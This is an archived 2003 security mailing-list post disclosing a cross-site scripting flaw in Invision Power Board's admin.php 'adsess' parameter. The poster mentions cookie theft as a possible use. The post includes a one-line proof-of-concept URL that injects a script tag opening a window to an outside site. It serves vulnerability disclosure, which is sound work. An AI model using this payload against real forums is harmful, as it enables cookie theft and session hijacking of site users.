bug in Invision Power Board

From: Boy Bear (eyal067at_private)
Date: Sat Aug 09 2003 - 01:21:31 PDT

Next message: Matt Zimmerman: "[SECURITY] [DSA-370-1] New pam-pgsql packages fix format string vulnerability"

Previous message: Immunix Security Team: "[Immunix-announce] Immunix Secured OS 7+ wu-ftpd update"
Next in thread: Boy Bear: "Re: bug in Invision Power Board"
Reply: Boy Bear: "Re: bug in Invision Power Board"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) I found possibility to run Script (java Script, VBScript) on the system Invision Power Board... It's possible to do if it much {many} things like a withdrawal of cookie, advertising .... For example: http://forums.invisionpower.com/admin.php?adsess='><script>window.open (window.location.search.substring (78));</script><http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision BoyBear From BinaryVision ( http://binaryvision.tech.nu )

Next message: Matt Zimmerman: "[SECURITY] [DSA-370-1] New pam-pgsql packages fix format string vulnerability"
Previous message: Immunix Security Team: "[Immunix-announce] Immunix Secured OS 7+ wu-ftpd update"
Next in thread: Boy Bear: "Re: bug in Invision Power Board"
Reply: Boy Bear: "Re: bug in Invision Power Board"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Aug 09 2003 - 10:13:34 PDT